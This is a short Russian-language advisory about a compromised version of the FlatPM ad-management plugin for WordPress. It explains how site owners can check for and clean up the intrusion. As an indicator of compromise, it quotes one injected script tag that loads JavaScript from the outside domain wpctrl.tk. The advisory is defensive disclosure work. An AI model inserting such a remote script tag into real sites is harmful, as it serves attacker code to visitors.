Закрыта опасная уязвимость в плагине Flat PM
Вчера был скомпрометирован популярный плагин FlatPM для управления рекламой на сайтах под управлением WordPress.
Из-за уязвимости в плагине, которую Михаил Flat (автор плагина) поправил в версии 2.654, было взломано несколько сайтов.
Для проверки взлома нужно перейти в настройки вставки между тегами <head>
и </head>
и проверить нет ли там скрипта, который вы не добавляли.
Например:
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
Если это ваш случай, то настоятельно рекомендуем восстановить полный бекап сайта за вчерашний день или ранее и сразу обновить плагин до последней версии.
Также, если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.